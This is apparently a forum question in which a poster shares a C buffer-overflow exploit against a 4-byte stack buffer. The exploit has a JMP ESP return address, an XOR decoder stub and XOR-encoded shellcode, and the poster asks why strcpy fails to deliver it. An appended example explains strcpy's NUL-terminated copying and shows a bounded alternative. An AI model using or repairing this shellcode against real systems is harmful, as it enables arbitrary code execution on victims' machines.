I ran the experiment below. Can strcpy only copy a maximum of 255 characters?
Below is a piece of shellcode I wrote:
#include <string.h>

char *shell="\x41\x41\x41\x41\x41\x41\x41\x41"
"\x76\x7f\x33\xf3" //JMP ESP
"\x83\xC0\x14" //ADD EAX,14
"\x33\xC9" //XOR ECX,ECX
"\x8A\x1C\x08" //MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x44" //XOR BL,44 //0x44 is the key for this encoding
"\x88\x1C\x08" //MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" //INC ECX
"\x80\xFB\x90" //CMP BL,90
"\x75\xF1" //JNZ SHORT "\x8A\x1C\x08"
//encoded shellcode
"\x22\x77\x8d\x12\x20\xcf\x71\x74\x44\x44\x44\xcf\x32\x48\xcf\x32"
"\x58\xcf\x02\x4c\xcf\x3a\x64\xcf\x72\x22\x7d\x0b\x5c\x31\xb6\x11"
"\xc7\xa8\x64\xcf\xa8\xcd\x01\x40\x2c\x76\x30\xd5\x48\x14\xac\x07"
"\x44\x44\x44\x2c\x28\x28\x44\x44\x2c\x36\x30\x6a\x20\x2c\x29\x37"
"\x32\x27\xcf\x88\x15\xbb\x94\x2c\x48\xe4\x97\x6f\x14\xac\x60\x44"
"\x44\x44\x2e\x44\x2c\x6a\x21\x3c\x21\x2c\x27\x25\x28\x27\xcf\x90"
"\x16\xbb\x94\x2c\x27\xcd\x95\x0b\xcf\x09\x40\x15\xac\x41\x44\x44"
"\x44\x2e\x45\xbb\x94\x87\xcf\xb0\xc7\x82\x40\x11\xcf\x6a\xcf\x01"
"\x78\xcf\x10\x41\x3c\x47\x91\xcf\x0e\x5c\xcf\x1e\x64\x47\x99\x16"
"\xcf\x3a\x40\xcf\x12\x4c\x0d\x15\xcf\x70\xcf\x47\xb1\x77\x96\x4b"
"\xfa\x42\x7e\x80\x30\x4b\xcf\x8e\x85\x85\x5d\x85\x8e\x43\x4f\x95"
"\x47\x94\x02\xaf\xae\x7f\x93\x1d\x30\x40\xa6\x9f\xaf\x52\x1e\xcf"
"\x1e\x60\x47\x99\x22\xcf\x48\x0f\xcf\x1e\x58\x47\x99\xcf\x40\xcf"
"\x47\x81\x19\x87\x87\xd4\x44";
void main()
{
    char ch[4];        //4-byte stack buffer
    strcpy(ch,shell);  //unbounded copy: overflows ch
}
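Debugging shows that this shellcode itself can run, but when I use strcpy to fill the buffer, the function fails. Is it because strcpy cannot copy a certain character, or does the shellcode size need to be limited, or is the stack size limited?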
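An added example, not part of the original post: strcpy has no 255-character limit; it copies up to the first NUL byte and never checks the size of the destination. The C code below shows both behaviours on constructed inputs, next to a bounded copy that refuses input too large for a buffer such as `ch[4]`; all function names here are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* strcpy() copies everything up to the first NUL in src, with no length cap.
   Hypothetical helper: dst must be large enough for src. */
size_t copied_len(char *dst, const char *src)
{
    strcpy(dst, src);
    return strlen(dst);
}

/* Bounded copy: rejects input that does not fit instead of overflowing.
   Returns 0 on success, -1 if src plus its NUL exceeds dst_size. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Constructed input: 600 non-NUL bytes, well past 255. */
size_t demo_long_copy(void)
{
    char src[601], dst[1024];
    memset(src, 'A', 600);
    src[600] = '\0';
    return copied_len(dst, src);
}

/* Constructed input: 31 bytes with a NUL planted at offset 10. */
size_t demo_embedded_nul(void)
{
    char src[32], dst[32];
    memset(src, 'B', 31);
    src[31] = '\0';
    src[10] = '\0';
    return copied_len(dst, src);
}

int main(void)
{
    char ch[4];
    printf("long: %zu, embedded NUL: %zu\n", demo_long_copy(), demo_embedded_nul());
    printf("8 bytes into ch[4]: %d\n", bounded_copy(ch, sizeof ch, "AAAAAAAA"));
    return 0;
}
```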